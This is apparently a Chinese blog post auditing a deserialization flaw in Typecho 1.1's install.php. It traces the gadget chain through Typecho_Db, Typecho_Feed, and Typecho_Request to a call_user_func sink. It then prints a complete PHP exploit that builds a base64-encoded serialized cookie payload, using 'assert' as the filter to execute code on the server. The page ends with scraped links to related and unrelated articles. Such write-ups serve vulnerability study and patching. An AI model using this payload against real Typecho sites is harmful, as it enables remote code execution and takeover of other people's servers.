0x01 漏洞代码

install.php:

<?php

                    $config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));

                    Typecho_Cookie::delete('__typecho_config');

                    $db = new Typecho_Db($config['adapter'], $config['prefix']);

                    $db->addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);

                    Typecho_Db::set($db);

                    ?>

执行到这里的条件:

跟进Typecho_Cookie::get('__typecho_config')   cookie.php 77-82行

    public static function get($key, $default = NULL)

    {

        $key = self::$_prefix . $key;

        $value = isset($_COOKIE[$key]) ? $_COOKIE[$key] : (isset($_POST[$key]) ? $_POST[$key] : $default);

        return is_array($value) ? $default : $value;

    }

$value赋值从$_COOKIE里或post中接收$key。

回到install.php:

install.php第232行:$db = new Typecho_Db($config['adapter'], $config['prefix']);,

这里, 跟进Typecho_Db, 有一行代码是:$adapterName = ‘Typecho_Db_Adapter_’ . $adapterName; 这里的$adapterName就对应着config里面的adapter,这里用了拼接操作,会触发类的toString方法。

Db.php:

   public function __construct($adapterName, $prefix = 'typecho_')

    {

        /** 获取适配器名称 */

        $this->_adapterName = $adapterName;

        /** 数据库适配器 */

        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;

        if (!call_user_func(array($adapterName, 'isAvailable'))) {

            throw new Typecho_Db_Exception("Adapter {$adapterName} is not available");

        }

        $this->_prefix = $prefix;

        /** 初始化内部变量 */

        $this->_pool = array();

        $this->_connectedPool = array();

        $this->_config = array();

        //实例化适配器对象

        $this->_adapter = new $adapterName();

    }

查看后发现

Feed.php重写了__toString()方法

Feed.php  212-226 lines:

foreach ($this->_items as $item) {

                $content .= '<item rdf:about="' . $item['link'] . '">' . self::EOL;

                $content .= '<title>' . htmlspecialchars($item['title']) . '</title>' . self::EOL;

                $content .= '<link>' . $item['link'] . '</link>' . self::EOL;

                $content .= '<dc:date>' . $this->dateFormat($item['date']) . '</dc:date>' . self::EOL;

                $content .= '<description>' . strip_tags($item['content']) . '</description>' . self::EOL;

                if (!empty($item['suffix'])) {

                    $content .= $item['suffix'];

                }

                $content .= '</item>' . self::EOL;

                $links[] = $item['link'];

                if ($item['date'] > $lastUpdate) {

                    $lastUpdate = $item['date'];

                }

            }

调用了$item['author']->screenName$item$this->_items的foreach循环出来的,并且$this->_itemsTypecho_Feed类的一个private属性。

如果这里screenName属性不存在会调用__get()方法

Request.php:

    public function __get($key)

    {

        return $this->get($key);

    }

get():

检测$key是否在$this->_params[$key]这个数组里面,如果有的话将值赋值给$value

_applyFiter():

这里就很清楚明了了  两个回调后门 $filter$value可控

    private function _applyFilter($value)

    {

        if ($this->_filter) {

            foreach ($this->_filter as $filter) {

                $value = is_array($value) ? array_map($filter, $value) :

                call_user_func($filter, $value);

            }

            $this->_filter = array();

        }

        return $value;

    }

0x02 漏洞利用

exp:

<?php

class Typecho_Feed

{

    const RSS1 = 'RSS 1.0';

    const RSS2 = 'RSS 2.0';

    const ATOM1 = 'ATOM 1.0';

    const DATE_RFC822 = 'r';

    const DATE_W3CDTF = 'c';

    const EOL = "\n";

    private $_type;

    private $_items;

    public function __construct(){

        $this->_type = $this::RSS2;

        $this->_items[0] = array(

            'title' => '',

            'link' => '',

            'date' => 1508895132,

            'category' => array(new Typecho_Request()),

            'author' => new Typecho_Request(),

        );

    }

}

class Typecho_Request

{

    private $_params = array();

    private $_filter = array();

    public function __construct(){

        $this->_params['screenName'] = 'phpinfo()';

        $this->_filter[0] = 'assert';

    }

}

$exp = array(

    'adapter' => new Typecho_Feed(),

    'prefix' => 'typecho_'

);

echo base64_encode(serialize($exp));

代码审计-Typecho反序列化getshell的更多相关文章

  1. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  2. [php代码审计] Typecho 1.1 -反序列化Cookie数据进行前台Getshell

    环境搭建 源码下载:https://github.com/typecho/typecho/archive/v1.1-15.5.12-beta.zip 下载后部署到web根目录,然后进行安装即可,其中注 ...

  3. 【代码审计】后台Getshell的两种常规姿势

    0x00 前言 在早些年刚接触web安全的时候,基础套路都是找注入--找后台--找上传点--找数据库备份--Getshell,然而在代码审计的角度,也存在类似的基本操作. 这里结合代码实例介绍白盒Ge ...

  4. Typecho反序列化漏洞

    Typecho Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了命令执行,Typecho 1.1(15.5.12)之前的 ...

  5. Typecho 反序列化漏洞 分析及复现

    0x00 漏洞简介 CVE-2018-18753 漏洞概述: typecho 是一款非常简洁快速博客 CMS,前台 install.php 文件存在反序列化漏洞,通过构造的反序列化字符串注入可以执行任 ...

  6. [代码审计]covercms 后台getshell

    0x00 环境介绍 CMS名称: covercms 运行环境: php 5.6.27-nts + apache + mysql 系统版本: 1.16 漏洞等级:高危 漏洞简介: 后台awnotas.i ...

  7. [代码审计]php反序列化漏洞

    0x01 php面向对象简介 对象:可以对其做事情的一些东西.一个对象有状态.行为和标识三种属性. 类:一个共享相同结构和行为的对象的集合. 每个类的定义都以关键字class开头,后面跟着类的名字. ...

  8. 2020/2/2 PHP代码审计之反序列化

    0x00 序列化与反序列化 序列化: serialize()把对象转换为字节序列的过程称为对象的序列化 反序列化: unserialize()把字节序列恢复为对象的过程称为对象的反序列化 0x01 序 ...

  9. 【实战】Weblogic反序列化Getshell

    修仙就是干,直接操作起来 1.访问http://x.x.x.x:7001/wls-wsat/CoordinatorPortType 2.加入Content-Type:text/xml 3.在body中 ...

随机推荐

  1. SQL Server系统函数:元数据函数

    原文:SQL Server系统函数:元数据函数 1.列的长度.列名 --列的长度 select COL_LENGTH('dbo.wct', --表名 'wcid') --列名 --列名 select ...

  2. C#从零单排上王者系列---元组

    从零单排系列说明 博主最初的想法是想写个蜕茧成蝶的系列文章,后来觉得博客的表现形式很难做到连贯和系统.所以从本篇博客开始博主会选择书中比较重要和不好理解的知识点并结合自己的实际工作经验来讲解,不再是照 ...

  3. DotNet跨平台 - docker部署.net core2.0项目

    参考文档: https://docs.docker.com/install/linux/docker-ce/centos/ http://www.dockerinfo.net/document htt ...

  4. C#常用数据结构

    常碰到的几种数据结构:Array,ArrayList,List,LinkedList,Queue,Stack,Dictionary<K,T>: 1.数组是最简单的数据结构.其具有如下特点: ...

  5. luogu2657-Windy数题解--数位DP

    题目链接 https://www.luogu.org/problemnew/show/P2657 分析 第一道数位DP题,发现有点意思 DP求\([L,R]\)区间内的XXX个数,很套路地想到前缀和, ...

  6. 什么?在SAP中国研究院里还需要会PHP开发?

    请原谅Jerry这篇文章的题目有"标题党"的嫌疑. 没错,至少SAP成都研究院的部分团队如此,比如Jerry目前就职的SAP成都研究院数字创新空间. 之前Jerry的文章, 曾经提 ...

  7. Dephi 10.3.3试用报告

    官方没有正式发布,但出了下载及keygen,具体内容我在这篇内容写了:Delphi 10.3.3最新消息 . 也可以去Delphi多层开发交流QQ群:209321818找相关的keygen. 今早来就 ...

  8. 【问题】Difference between ">/dev/null 2>&1" and "2>&1 >/dev/null"

    https://www.unix.com/shell-programming-and-scripting/125947-difference-between-dev-null-2-1-2-1-dev- ...

  9. 用js刷剑指offer(变态跳台阶)

    一只青蛙一次可以跳上1级台阶,也可以跳上2级……它也可以跳上n级.求该青蛙跳上一个n级的台阶总共有多少种跳法. 牛客网链接 思路 假设青蛙跳上一个n级的台阶总共有f(n)种跳法. 现在青蛙从第n个台阶 ...

  10. opencv+python 添加文字 cv2.putText

    import cv2 img = cv2.imread('E:\\usb_test\\example\\yolov3\\rknn_emotion\\test_images\\llj5.jpg') fo ...